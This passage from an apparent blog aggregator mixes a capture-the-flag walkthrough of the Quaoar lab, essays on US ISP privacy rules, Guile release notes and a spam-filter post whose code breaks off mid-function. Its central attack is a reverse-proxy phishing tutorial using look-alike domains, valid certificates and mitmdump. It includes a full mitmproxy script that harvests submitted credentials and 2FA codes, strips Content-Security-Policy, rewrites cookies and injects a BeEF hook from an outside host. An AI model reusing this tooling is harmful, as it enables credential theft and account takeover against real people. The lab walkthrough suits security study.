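        "interactive": [],      # accounts a password ssh login could reach
    }
    for e in entries:
        if e.password == "":
            findings["empty_password"].append(e.username)
        elif e.password != "x" and not e.password.startswith(("*", "!")):
            findings["hash_in_passwd"].append(e.username)
        if e.uid == 0 and e.username != "root":
            findings["extra_uid0"].append(e.username)
        if e.shell not in NOLOGIN_SHELLS:
            findings["interactive"].append(e.username)
    return findings


# Constructed sample loosely modelled on an Ubuntu 12.04 host. The 'legacy',
# 'backup' (deliberately UID 0) and 'guest' lines are planted findings.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
wpadmin:x:1001:1001:,,,:/home/wpadmin:/bin/bash
legacy:$6$constructedsalt$constructedhash:1002:1002::/home/legacy:/bin/bash
backup:x:0:34:backup:/var/backups:/bin/sh
guest::1003:1003::/home/guest:/bin/bash
"""

if __name__ == "__main__":
    for key, users in audit(parse_passwd(SAMPLE_PASSWD)).items():
        print(f"{key:15} {users}")
```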

Great! So do we have any that have a password listed, or are they all ‘x’, meaning it’s being pulled from the shadow file? Nope, doesn’t look that way. So we know that WordPress was pretty default, and it looks like one of our users is wpadmin. Let's try and see if we can ssh in as that user with a default/weak password.

root@kali:/usr/share/dirbuster/wordlists# ssh wpadmin@172.16.13.128
wpadmin@172.16.13.128's password:
Permission denied, please try again.
wpadmin@172.16.13.128's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Mar 25 07:45:42 EDT 2017

System load: 0.12 Processes: 108
Usage of /: 37.6% of 7.21GB Users logged in: 0
Memory usage: 25% IP address for eth0: 172.16.13.128
Swap usage: 11%

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Oct 22 23:03:05 2016 from 192.168.1.26
$

BOOM! We’re in and have our first shell! Let's see where we are and what’s in this directory.

$ pwd
/home/wpadmin
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796egoo

Privilege Escalation


Ok, so now that we have a shell we need to find some privilege escalation. One of the first places I tend to look is in the cron jobs, to see what is running.

wpadmin@Quaoar:~$ pwd
/home/wpadmin
wpadmin@Quaoar:~$ cd /etc/cron.
cron.d/ cron.daily/ cron.hourly/ cron.monthly/ cron.weekly/
wpadmin@Quaoar:~$ cd /etc/cron.d
wpadmin@Quaoar:/etc/cron.d$ ls
php5

So it looks like we have something in cron.d, which was first on the list. Let's take a look at what's in the php5 file.

wpadmin@Quaoar:/etc/cron.d$ cat php5
# /etc/cron.d/php5: crontab fragment for php5
# This purges session files older than X, where X is defined in seconds
# as the largest value of session.gc_maxlifetime from all your php.ini
# files, or 24 minutes if not defined. See /usr/lib/php5/maxlifetime
# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
# Look for and purge old sessions every 30 minutes
09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete

What's that? Is that another hidden flag? "# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de". Interesting... Upon further reading of others' walkthroughs I confirmed that this is indeed the 3rd flag, but we've still yet to get any privilege escalation, so let's continue on.

So we know it's running a WordPress site and we know it's running Apache. Let's take a look at what's in /var/www/ to see if we find any hidden gems.

wpadmin@Quaoar:/$ cd var/www/
wpadmin@Quaoar:/var/www$ ls
CHANGELOG index.html
COPYING INSTALL
hacker-manifesto-ethical.jpg LICENSE
hacking.jpg pososibo-ethical-hacking-hack-fond.jpg
hack-planet-1280-amox-zone.jpg Quaoar.jpg
hack-planet-high-definition-mobile.jpg README.md
Hack_The_Planet2.jpg robots.txt
Hack_The_Planet3.jpg tomcat6-tomcat6-tmp
Hack_The_Planet.jpg upload
hsperfdata_tomcat6 wordpress

Hmm, let's cat through some of these files and see what's in them. It seems we have a lot of files to comb over, so let's make this a little easier. What I ended up doing was using "grep" to look through multiple files at once.

wpadmin@Quaoar:/var/www$ grep "root" * -R | less

This lets us look through all the files recursively for "root", piping to less so we can comb over it all. I also went a step further and used some regex in less to look for "root:", which I suppose I could have done during the grep. I had to really comb over it since it was going through quite a few files, but eventually I spotted this


Looks like 'root' has the password 'rootpassword!', so let's give that a try.



That's it! We got all 3 flags at this point. Hope you enjoyed this walkthrough.

by k0ncepts (noreply@blogger.com)

April 01, 2017

Alan :: law, technology and cinema, washed down with wine

The FCC and the Tectonics of Commercial Surveillance

It’s been a dreadful week if you care about privacy online in the US. Last October the FCC passed broadband consumer privacy rules that constrained ISPs from commercialising users’ browsing data. These rules required that users opt in to such usage rather than having to opt out. Companies intent on profiting from user data hate opt-in requirements, as they know that many will not agree to these uses. Conversely, many people who value privacy do not opt out because they are unaware the option exists, don’t know how to avail of it, or the choice may be presented to them in terms which are confusing; in such cases users tend to stick to the default setting.

Ajit Pai, the new head of the FCC, made clear his opposition to both the privacy and net neutrality rules when he was one of two Republican minority appointees on the last Commission. Reversal of the privacy rules was lobbied for intensely by the Cable providers (NCTA), wireless companies (CTIA) and the Telecom sector (US Telecom). They were supported by almost the entire advertising sector, notably the Interactive Advertising Bureau (IAB). The sole exception is the Digital Advertising Alliance who have been conspicuous by their silence. DAA represents online advertising behemoths such as Google and Facebook and their interests are somewhat at odds with those of the infrastructure owners.

Sensitive or Insensitive?

Until last October browsing records were in the main classified as insensitive information. Sensitive information is characterized as that relating to financial and health data and information relating to children. This is the Federal Trade Commission’s classification, and is what allows Adtech to collect information about users without their consent. In 2015, as part of the net neutrality process, broadband provision was re-categorized from an information service to a telecommunications service. This may sound trivial, but it meant ISPs became classed as ‘common carriers’ and were placed under the jurisdiction of the FCC. The FCC then determined that browsing history as a whole is sensitive data, requiring companies to get opt-in consent to be allowed to use it.

Competition between Privacy Invaders

The cable, wireless and telecom companies hate this because they want to get into the personal-data-fueled advertising business, and their position sitting over the pipe of user data gives them an unparalleled vantage point from which to observe. Google and Facebook meanwhile track users over as much of the web as they can: on their own widely popular properties, and, using third-party cookies and social media buttons (Like!, G+), on other sites that connect to their infrastructure for advertising or marketing purposes. Effectively this means they can surveil most users over the lion’s share of their online activity (see the research from Englehardt & Narayanan). These two colossi currently dominate internet advertising and are obviously keen to suppress the emergence of new competitors. But they also want to protect against the risk of their own data collection being redefined as involving sensitive information; the problem could spread from the FCC to their overseers (ha!) at the FTC. That’s why Google opposed this redefinition and lobbied against it.

Secondly, the DAA has its own self-regulatory privacy framework. This describes how three classes of actors interact with user privacy: first parties (sites that you visit intentionally); third parties (domains that you interact with unknowingly because they provide services to the first party); and service providers, meaning ISPs. In their schema, service providers must get user consent for the use of data for any purpose other than performance tuning. This explains why the DAA actively opposed the new privacy rules in the run-up to their introduction but is quiet now. It also explains the slurs being thrown at privacy advocates that they are acting as stooges for Google.

Policy Gobbledygook

With this background let’s parse the Orwellian gobbledygook issued by industry lobbyists after their victory:

“We appreciate today’s Senate action to repeal unwarranted FCC rules that deny consumers consistent privacy protection online and violate competitive neutrality (#1). … Our industry remains committed to offering services that protect the privacy and security of the personal information of our customers (#2). We support this step towards reversing the FCC’s misguided approach and look forward to restoring a consistent approach to online privacy protection that consumers want and deserve (#3).”

#1 = These rules put us at a competitive disadvantage to Google/Facebook, they can intrude, we can’t – it wasn’t fair!

#2 = We’ll decide what information of yours is personal and what is not (it’s all entertainment data, right?!). You can trust us.

#3 = Now that users have no privacy protections from either the biggest publishers or the infrastructure providers, the playing field is finally level! Yes, we could have lobbied to have Google and Facebook subjected to the same constraints and evened things up that way, but nah, silly idea.

The big winners are companies like Verizon, who bought AOL to move their business towards online advertising and are in the process of taking over what’s left of Yahoo. They’ve bought themselves an advertising infrastructure with lots of data of its own and can now exploit the data trail of their own customers. AT&T are also in celebratory mood and have been gushing about the Trump administration more generally. Back in 2013 they operated a program called ‘Internet Preferences’ which charged extra to users who opted out of having their usage data exploited to target them with behavioural advertising. Having achieved their goal of overturning the regulations, the telecoms are claiming they won’t sell users’ browsing history. But selling data is not the model of Google or Facebook either; once sold, the competitive advantage the data provides is lost. Instead they control access to it for long-term exploitation: they administer the data, and marketers pay them, directly or indirectly, to take advantage of it.

Self-Defense?
For plain HTTP, the ISP sits on the path and can read the full URL of every page you visit, query strings included. If the site is served over HTTPS, only the hostname is exposed (through your DNS lookup and the Server Name Indication field sent in the clear at the start of the TLS handshake); the path, the query string and the page contents are encrypted. That is a partial mitigation, but another good reason to use HTTPS Everywhere.

There are two technical responses to this situation, both of which are unsatisfactory.

Tor: if you use Tor to access the web then your traffic is encrypted and routed via a series of other servers before reaching the destination website. Thus the traffic is concealed from the ISP, but at the cost of performance: all that circumnavigation to get your request to its final destination slows down the process. (The ISP can still see that you are connecting to the Tor network, and the exit relay sees whatever the site’s own HTTPS does not encrypt.) If it sounds too technical for you, think again: the Tor Browser requires zero configuration overhead.

VPN: if you use a virtual private network then all your web traffic is routed through an encrypted tunnel to another server, so the ISP can only observe you connecting to that server. That’s great, but VPNs are paid services, typically between $30 and $100 a year. If you use a VPN for this purpose you are hoping that the provider is more trustworthy than the ISP, since it now sees exactly what the ISP used to see; yet the VPN world is fragmented among small providers and has no consistent audit standard. Make sure your DNS queries go through the tunnel too, or the hostnames you visit still leak to the ISP.


by nonrival

March 31, 2017

Chokepoint

Reverse proxy phishing with valid certificates

Introduction

This is going to be a quick down-and-dirty post on how to create cloned websites on the fly by using mitmdump as a reverse proxy and Let's Encrypt for valid certificates. Putting a reverse proxy in front of a site gives a very convincing and advanced phishing campaign: the victim interacts with the real site through our proxy, so we can capture two-factor authentication PINs as they are submitted and attempt automatic VPN logins with them.

Acquire a domain

There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up blog.chokepoint.net instead of purchasing a domain, for demonstration's sake, and demonstrate a phish by setting up a reverse proxy for shodan.io.

CatMyFish is an excellent tool that relies on expireddomains.net in order to find potential expired domains.

Lets Encrypt!

Let's Encrypt is a free, automated, and open CA that's available to anyone who controls a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross-platform ACME client that proves to the CA that you control the domain before any certificate is issued. One thing to keep in mind: Let's Encrypt submits every certificate it issues to public Certificate Transparency logs, so anyone monitoring CT for look-alike names will see your phishing domain as soon as the certificate exists.

Download certbot


$ wget https://dl.eff.org/certbot-auto
$ chmod a+x certbot-auto
$ ./certbot-auto

Now simply run the following command and choose "Spin up a temporary webserver (standalone)". The domain's DNS record must already point at this machine, and the challenge port (80 for http-01, 443 for tls-sni-01) must be reachable from the internet and not already in use.


$ ./certbot-auto certonly

Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/site.domain.here. To prepare the certificate for use with our reverse proxy MITM attack, simply concatenate the private key and the full chain into one PEM file. The resulting file contains your private key, so keep it readable only by the user running mitmdump.


$ sudo cat /etc/letsencrypt/live/blog.chokepoint.net/privkey.pem /etc/letsencrypt/live/blog.chokepoint.net/fullchain.pem > blog.chokepoint.net.pem

Download latest mitmproxy

Mitmproxy recently went through a large upgrade that may not have made it into your distribution's repositories yet. We'll grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in the 2.x versions.


$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
$ sudo pip3 install mitmproxy==0.18.2

Execute reverse proxy attack


$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -w blog.log

Here -R makes mitmdump a reverse proxy for the target site, -p 443 binds the HTTPS port (hence sudo), --no-upstream-cert stops mitmproxy from fetching the upstream server's certificate to mimic it and --cert serves the Let's Encrypt PEM we just assembled instead; -w writes every flow to blog.log for later inspection. Notice how the URL bar has the green Secure logo and all.

Going Beyond

Here are two scripts that will help in dumping credentials, as well as an example script for injecting BeEF hooks into sessions passing through the MITM.

Dumping credentials

Beef injection

Running scripts

In order to execute scripts, use the -s option in mitmdump. For example:

$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -s ./dump_creds.py -w blog.log

$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -w blog.log -s "beef_injector.py http://beef.chokepoint.net:3000/hook.js"
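As an added example (my own, not the dump_creds.py or beef_injector.py scripts from the original post), here is one mitmdump script that does both jobs and adds two things a reverse-proxy phish needs in practice: it drops the Domain attribute from the upstream site's Set-Cookie headers, since the browser would otherwise reject cookies scoped to shodan.io while talking to blog.chokepoint.net and the session would never stick, and it strips Content-Security-Policy, which would otherwise block the injected hook. It assumes the module-level request()/response() hook convention of the 0.18 scripting API used above (load it with -s as shown), that flow.content is the decoded body, and the Headers multidict calls get_all()/set_all(); the credential field regex, the log file name and the hostnames are this example's placeholders. The helpers take plain bytes and strings, so they can be exercised without mitmproxy.

```python
"""Hooks for the reverse-proxy phish above: log submitted credentials,
keep the victim pinned to the phishing host, and inject a BeEF hook.

Added example, not the scripts from the original post.  Assumes the
module-level request()/response() hook convention of the mitmproxy 0.18
scripting API (run with the -s option shown above) and uses the post's
hostnames as placeholders.
"""
import json
import re
import time
from urllib.parse import parse_qs

TARGET_HOST = "www.shodan.io"        # the real site being proxied (-R target)
PHISH_HOST = "blog.chokepoint.net"   # the hostname the victim actually sees
HOOK_URL = "http://beef.chokepoint.net:3000/hook.js"   # BeEF hook, as in the post
CRED_LOG = "creds.jsonl"             # one JSON record per captured submission

# Field names that usually carry a username, password or 2FA code (assumption).
CRED_FIELDS = re.compile(r"user|login|email|pass|pwd|otp|token|code|pin", re.I)


def extract_credentials(body, content_type=""):
    """Return {field: value} for credential-looking fields in a POST body.

    Understands application/x-www-form-urlencoded and JSON bodies;
    anything else yields an empty dict.
    """
    if isinstance(body, bytes):
        body = body.decode("utf-8", "replace")
    if "json" in content_type:
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        fields = {k: str(v) for k, v in data.items()} if isinstance(data, dict) else {}
    else:
        fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {k: v for k, v in fields.items() if CRED_FIELDS.search(k)}


def rewrite_cookie(set_cookie):
    """Drop the Domain attribute so cookies the upstream site scopes to its
    own domain are accepted by the browser for the phishing host.
    Secure/HttpOnly can stay: the phish is served over a valid HTTPS cert."""
    parts = [p.strip() for p in set_cookie.split(";")]
    return "; ".join(p for p in parts if not p.lower().startswith("domain="))


def rewrite_host(text):
    """Point absolute references at the phishing host so links and
    redirects do not take the victim out of the proxy."""
    return text.replace(TARGET_HOST, PHISH_HOST)


def inject_hook(html, hook_url=HOOK_URL):
    """Insert the hook script before </body> (or </html>, or at the end)."""
    tag = '<script src="%s"></script>' % hook_url
    lower = html.lower()
    for marker in ("</body>", "</html>"):
        idx = lower.rfind(marker)
        if idx != -1:
            return html[:idx] + tag + html[idx:]
    return html + tag


# ---- mitmproxy hooks (0.18 module-level convention) -------------------

def request(flow):
    """Record credentials from POST bodies before they are forwarded upstream."""
    req = flow.request
    if req.method == "POST" and req.content:
        creds = extract_credentials(req.content, req.headers.get("content-type", ""))
        if creds:
            with open(CRED_LOG, "a") as log:
                log.write(json.dumps({"ts": time.time(), "url": req.url,
                                      "creds": creds}) + "\n")


def response(flow):
    """Re-scope cookies, drop CSP, rewrite redirects and hook every HTML page."""
    resp = flow.response
    for h in ("content-security-policy", "content-security-policy-report-only"):
        if h in resp.headers:
            del resp.headers[h]              # CSP would refuse the injected script
    if "location" in resp.headers:
        resp.headers["location"] = rewrite_host(resp.headers["location"])
    cookies = resp.headers.get_all("set-cookie")
    if cookies:
        resp.headers.set_all("set-cookie", [rewrite_cookie(c) for c in cookies])
    if "text/html" in resp.headers.get("content-type", "") and resp.content:
        html = resp.content.decode("utf-8", "replace")   # .content is the decoded body
        resp.content = inject_hook(rewrite_host(html)).encode("utf-8")
```

The credential log is append-only JSON lines, so a second terminal can tail it while the campaign runs. A 2FA code captured this way is only useful for the few seconds before it expires, which is why the post talks about attempting the VPN login automatically rather than by hand.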

by stderr (noreply@blogger.com)

March 27, 2017

Data Knightmare

DataKnightmare 1x24 - 95 tesi per il mondo immateriale

Today we read the "95 Theses for the Immaterial World" by JM Porup, an American investigative journalist. Twenty-one years after the romantic vision of John Barlow's "Declaration of the Independence of Cyberspace", Porup confronts us with the reality of what the Internet has really become: an instrument of global surveillance and colonial domination.

by Runtime Radio

March 26, 2017

Evgeny Morozov

By dismantling domestic privacy laws, the US will lose control of the global internet

If Donald Trump signs off changes, he weakens America’s ‘global village’ role

The numerous paradoxes that will haunt Donald Trump in the coming months were on full display during the recent Senate vote to undo privacy legislation that was passed in the last few years of the Obama administration.

As part of a broader effort to treat internet service providers and telecoms operators as utility companies, Obama imposed restrictions on what these companies could do with all the user data from browsers and apps. Emboldened by Trump, the Republicans have just allowed these businesses to collect, sell and manipulate such data without user permission.

Continue reading...

by Evgeny Morozov

March 24, 2017

videogame confessional forum

joe bond

Okay, sounds good. My name is Joe Bond. I live in Northern Virginia. I work as a firefighter/paramedic. I've been doing that for about 10 years now. So, that, basically, has nothing to do with...

by david wolinsky

March 21, 2017

Data Knightmare

DataKnightmare 1x23 - Benvenuti a GATTACA

The US Congress has introduced a bill that allows companies to require genetic tests from their employees, and to do as they like with the data. This would allow companies to discriminate against employees on the basis of their genetic profile. Perhaps the US has not learned much from the years of racial segregation; but does Europe still remember the camps? Are we sure that nobody would dare to introduce a similar law here?

by Runtime Radio

March 15, 2017

Andy Wingo

guile 2.2 omg!!!

Oh, good evening my hackfriends! I am just chuffed to share a thing with yall: tomorrow we release Guile 2.2.0. Yaaaay!

I know in these days of version number inflation that this seems like a very incremental, point-release kind of a thing, but it's a big deal to me. This is a project I have been working on since soon after the release of Guile 2.0 some 6 years ago. It wasn't always clear that this project would work, but now it's here, going into production.

In that time I have worked on JavaScriptCore and V8 and SpiderMonkey and so I got a feel for what a state-of-the-art programming language implementation looks like. Also in that time I ate and breathed optimizing compilers, and really hit the wall until finally paging in what Fluet and Weeks were saying so many years ago about continuation-passing style and scope, and eventually came through with a solution that was still CPS: CPS soup. At this point Guile's "middle-end" is, I think, totally respectable. The backend targets a quite good virtual machine.

The virtual machine is still a bytecode interpreter for now; native code is a next step. Oddly my journey here has been precisely opposite, in a way, to An incremental approach to compiler construction; incremental, yes, but starting from the other end. But I am very happy with where things are. Guile remains very portable, bootstrappable from C, and the compiler is in a good shape to take us the rest of the way to register allocation and native code generation, and performance is pretty ok, even better than some natively-compiled Schemes.

For a "scripting" language (what does that mean?), I also think that Guile is breaking nice ground by using ELF as its object file format. Very cute. As this seems to be a "Andy mentions things he's proud of" segment, I was also pleased with how we were able to completely remove the stack size restriction.

high fives all around

As is often the case with these things, I got the idea for removing the stack limit after talking with Sam Tobin-Hochstadt from Racket and the PLT group. I admire Racket and its makers very much and look forward to (stealing from) working with them in the future.

Of course the ideas for the contification and closure optimization passes are in debt to Matthew Fluet and Stephen Weeks for the former, and Andy Keep and Kent Dybvig for the latter. The intmap/intset representation of CPS soup itself is highly indebted to the late Phil Bagwell, to Rich Hickey, and to Clojure folk; persistent data structures were an amazing revelation to me.

Guile's virtual machine itself was initially heavily inspired by JavaScriptCore's VM. Thanks to WebKit folks for writing so much about the early days of Squirrelfish! As far as the actual optimizations in the compiler itself, I was inspired a lot by V8's Crankshaft in a weird way -- it was my first touch with fixed-point flow analysis. As most of yall know, I didn't study CS, for better and for worse; for worse, because I didn't know a lot of this stuff, and for better, as I had the joy of learning it as I needed it. Since starting with flow analysis, Carl Offner's Notes on graph algorithms used in optimizing compilers was invaluable. I still open it up from time to time.

While I'm high-fiving, large ups to two amazing support teams: firstly to my colleagues at Igalia for supporting me on this. Almost the whole time I've been at Igalia, I've been working on this, for about a day or two a week. Sometimes at work we get to take advantage of a Guile thing, but Igalia's Guile investment mainly pays out in the sense of keeping me happy, keeping me up to date with language implementation techniques, and attracting talent. At work we have a lot of language implementation people, in JS engines obviously but also in other niches like the networking group, and it helps to be able to transfer hackers from Scheme to these domains.

I put in my own time too, of course; but my time isn't really my own either. My wife Kate has been really supportive and understanding of my not-infrequent impulses to just nerd out and hack a thing. She probably won't read this (though maybe?), but it's important to acknowledge that many of us hackers are only able to do our work because of the support that we get from our families.

a digression on the nature of seeking and knowledge

I am jealous of my colleagues in academia sometimes; of course it must be this way, that we are jealous of each other. Greener grass and all that. But when you go through a doctoral program, you know that you push the boundaries of human knowledge. You know because you are acutely aware of the state of recorded knowledge in your field, and you know that your work expands that record. If you stay in academia, you use your honed skills to continue chipping away at the unknown. The papers that this process reifies have a huge impact on the flow of knowledge in the world. As just one example, I've read all of Dybvig's papers, with delight and pleasure and avarice and jealousy, and learned loads from them. (Incidentally, I am given to understand that all of these are proper academic reactions :)

But in my work on Guile I don't actually know that I've expanded knowledge in any way. I don't actually know that anything I did is new and suspect that nothing is. Maybe CPS soup? There have been some similar publications in the last couple years but you never know. Maybe some of the multicore Concurrent ML stuff I haven't written about yet. Really not sure. I am starting to see papers these days that are similar to what I do and I have the feeling that they have a bit more impact than my work because of their medium, and I wonder if I could be putting my work in a more useful form, or orienting it in a more newness-oriented way.

I also don't know how important new knowledge is. Simply being able to practice language implementation at a state-of-the-art level is a valuable skill in itself, and releasing a quality, stable free-software language implementation is valuable to the world. So it's not like I'm negative on where I'm at, but I do feel wonderful talking with folks at academic conferences and wonder how to pull some more of that into my life.

In the meantime, I feel like (my part of) Guile 2.2 is my master work in a way -- a savepoint in my hack career. It's fine work; see A Virtual Machine for Guile and Continuation-Passing Style for some high level documentation, or many of these bloggies for the nitties and the gritties. OKitties!

getting the goods

It's been a joy over the last two or three years to see the growth of Guix, a packaging system written in Guile and inspired by GNU stow and Nix. The laptop I'm writing this on runs GuixSD, and Guix is up to some 5000 packages at this point.

I've always wondered what the right solution for packaging Guile and Guile modules was. At one point I thought that we would have a Guile-specific packaging system, but one with stow-like characteristics. We had problems with C extensions though: how do you build one? Where do you get the compilers? Where do you get the libraries?

Guix solves this in a comprehensive way. From the four or five bootstrap binaries, Guix can download and build the world from source, for any of its supported architectures. The result is a farm of weirdly-named files in /gnu/store, but the transitive closure of a store item works on any distribution of that architecture.

This state of affairs was clear from the Guix binary installation instructions that just have you extract a tarball over your current distro, regardless of what's there. The process of building this weird tarball was always a bit ad-hoc though, geared to Guix's installation needs.

It turns out that we can use the same strategy to distribute reproducible binaries for any package that Guix includes. So if you download this tarball, and extract it as root in /, then it will extract some paths in /gnu/store and also add a /opt/guile-2.2.0. Run Guile as /opt/guile-2.2.0/bin/guile and you have Guile 2.2, before any of your friends! That pack was made using guix pack -C lzip -S /opt/guile-2.2.0=/ guile-next glibc-utf8-locales, at Guix git revision 80a725726d3b3a62c69c9f80d35a898dcea8ad90.

(If you run that Guile, it will complain about not being able to install the locale. Guix, like Scheme, is generally a statically scoped system; but locales are dynamically scoped. That is to say, you have to set GUIX_LOCPATH=/opt/guile-2.2.0/lib/locale in the environment, for locales to work. See the GUIX_LOCPATH docs for the gnarlies.)

Alternately of course you can install Guix and just guix package -i guile-next. Guix itself will migrate to 2.2 over the next week or so.

Welp, that's all for this evening. I'll be relieved to push the release tag and announcements tomorrow. In the meantime, happy hacking, and yes: this blog is served by Guile 2.2! :)

by Andy Wingo

March 13, 2017

Data Knightmare

DataKnightmare 1x22 - Fake news tu' sorella

Facebook moves against fake news. With a clever move, it hands off to others the task that should be its own. Unfortunately this solution is wrong and counterproductive: welcome to the dawn of online censorship.

by Runtime Radio

March 10, 2017

videogame confessional forum

celia pearce

I'll just give you a short snapshot of me. I have a day job as a college professor. I am an associate professor of game design at Northeastern University, which is located in Boston. That's my day...

by david wolinsky

March 07, 2017

Data Knightmare

DataKnightmare 1x21 - La posta in gioco

In words, nobody wants to control the network. Yet the copyright industry, politicians and the Internet giants are all moving in that direction, obviously to protect the innocent. What is really at stake?

by Runtime Radio

March 06, 2017

Andy Wingo

it's probably spam

Greetings, peoples. As you probably know, these words are served to you by Tekuti, a blog engine written in Scheme that uses Git as its database.

Part of the reason I wrote this blog software was that from the time when I was using Wordpress, I actually appreciated the comments that I would get. Sometimes nice folks visit this blog and comment with information that I find really interesting, and I thought it would be a shame if I had to disable those entirely.

But allowing users to add things to your site is tricky. There are all kinds of potential security vulnerabilities. I thought about the ones that were important to me, back in 2008 when I wrote Tekuti, and I thought I did a pretty OK job on preventing XSS and designing-out code execution possibilities. When it came to bogus comments though, things worked well enough for the time. Tekuti uses Git as a log-structured database, and so to delete a comment, you just revert the change that added the comment. I added a little security question ("what's your favorite number?"; any number worked) to prevent wordpress spammers from hitting me, and I was good to go.

Sadly, what was good enough in 2008 isn't good enough in 2017. In 2017 alone, some 2000 bogus comments made it through. So I took comments offline and painstakingly went through and separated the wheat from the chaff while pondering what to do next.

an aside

I really wondered why spammers bothered though. I mean, I added the rel="external nofollow" attribute on links, which should prevent search engines from granting relevancy to the spammer's links, so what gives? Could be that all the advice from the mid-2000s regarding nofollow is bogus. But it was definitely the case that while I was adding the attribute to commenter's home page links, I wasn't adding it to links in the comment. Doh! With this fixed, perhaps I will just have to deal with the spammers I have and not even more spammers in the future.

i digress

I started by simply changing my security question to require a number in a certain range. No dice; bogus comments still got through. I changed the range; could it be the numbers they were using were already in range? Again the bogosity continued undaunted.

So I decided to break down and write a bogus comment filter. Luckily, Git gives me a handy corpus of legit and bogus comments: all the comments that remain live are legit, and all that were ever added but are no longer live are bogus. I wrote a simple tokenizer across the comments, extracted feature counts, and fed that into a naive Bayesian classifier. I finally turned it on this morning; fingers crossed!

My trials at home show that if you train the classifier on half the data set (around 5300 bogus comments and 1900 legit comments) and then run it against the other half, I get about 6% false negatives and 1% false positives. The feature extractor interns sequences of 1, 2, and 3 tokens, and doesn't have a lower limit for number of features extracted -- a feature seen only once in bogus comments and never in legit comments is a fairly strong bogosity signal; as you have to make up the denominator in that case, I set it to indicate that such a feature is 99.9% bogus. A corresponding single feature in the legit set without appearance in the bogus set is 99% legit.

Of course with this strong of a bias towards precise features of the training set, if you run the classifier against its own training set, it produces no false positives and only 0.3% false negatives, some of which were simply reverted duplicate comments.

It wasn't straightforward to get these results out of a Bayesian classifier. The "smoothing" factor that you add to both numerator and denominator was tricky, as I mentioned above. Getting a useful tokenization was tricky. And the final trick was even trickier: limiting the significant-feature count when determining bogosity. I hate to cite Paul Graham but I have to do so here -- choosing the N most significant features in the document made the classification much less sensitive to the varying lengths of legit and bogus comments, and less sensitive to inclusions of verbatim texts from other comments.
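The pipeline described above, as an added Python illustration rather than the Scheme code that actually runs in Tekuti: a tokenizer that keeps URLs whole, 1-, 2- and 3-token features counted once per comment, the asymmetric treatment of one-sided features (99.9% bogus when seen only in bogus comments, 99% legit when seen only in legit ones) instead of ordinary smoothing, and the combination of only the N features furthest from 0.5. Those figures follow the post; the tokenizer, the frequency-normalised ratio used for features seen on both sides, the 0.9 threshold, N=15 and the training comments in train_demo() are this example's own constructed choices.

```python
"""Naive Bayesian comment filter along the lines the post describes.

Added Python illustration, not Tekuti's Scheme code.  The training
comments in train_demo() are constructed for this example.
"""
import math
import re
from collections import Counter

# URLs stay whole (a spam link is one strong feature); otherwise words.
TOKEN_RE = re.compile(r"https?://\S+|\w+")


def tokenize(text):
    return [t.lower() for t in TOKEN_RE.findall(text)]


def features(text, max_n=3):
    """Set of 1-, 2- and 3-token sequences in the text (each counted once)."""
    toks = tokenize(text)
    feats = set()
    for n in range(1, max_n + 1):
        for i in range(len(toks) - n + 1):
            feats.add(" ".join(toks[i:i + n]))
    return feats


class CommentFilter:
    def __init__(self, only_bogus=0.999, only_legit=0.01, top_n=15):
        self.bogus = Counter()   # feature -> number of bogus comments containing it
        self.legit = Counter()   # feature -> number of legit comments containing it
        self.n_bogus = 0
        self.n_legit = 0
        self.only_bogus = only_bogus  # P(bogus | feature seen only in bogus comments)
        self.only_legit = only_legit  # P(bogus | feature seen only in legit comments)
        self.top_n = top_n

    def train(self, text, is_bogus):
        counts = self.bogus if is_bogus else self.legit
        for f in features(text):
            counts[f] += 1
        if is_bogus:
            self.n_bogus += 1
        else:
            self.n_legit += 1

    def p_bogus(self, feat):
        """P(bogus | feature).  A one-sided feature would put a zero on one
        side of the ratio; rather than smooth it away, assign the fixed
        one-sided probabilities the post uses."""
        b, g = self.bogus.get(feat, 0), self.legit.get(feat, 0)
        if b and not g:
            return self.only_bogus
        if g and not b:
            return self.only_legit
        pb = b / self.n_bogus          # fraction of bogus comments carrying the feature
        pg = g / self.n_legit          # fraction of legit comments carrying it
        return pb / (pb + pg)

    def score(self, text):
        """P(bogus) for a comment, combining only the top_n known features
        whose probability is furthest from 0.5, so long comments and quoted
        text from other comments do not swamp the signal."""
        probs = [self.p_bogus(f) for f in features(text)
                 if f in self.bogus or f in self.legit]
        if not probs:
            return 0.5
        probs.sort(key=lambda p: abs(p - 0.5), reverse=True)
        probs = probs[:self.top_n]
        log_b = sum(math.log(p) for p in probs)
        log_g = sum(math.log(1 - p) for p in probs)
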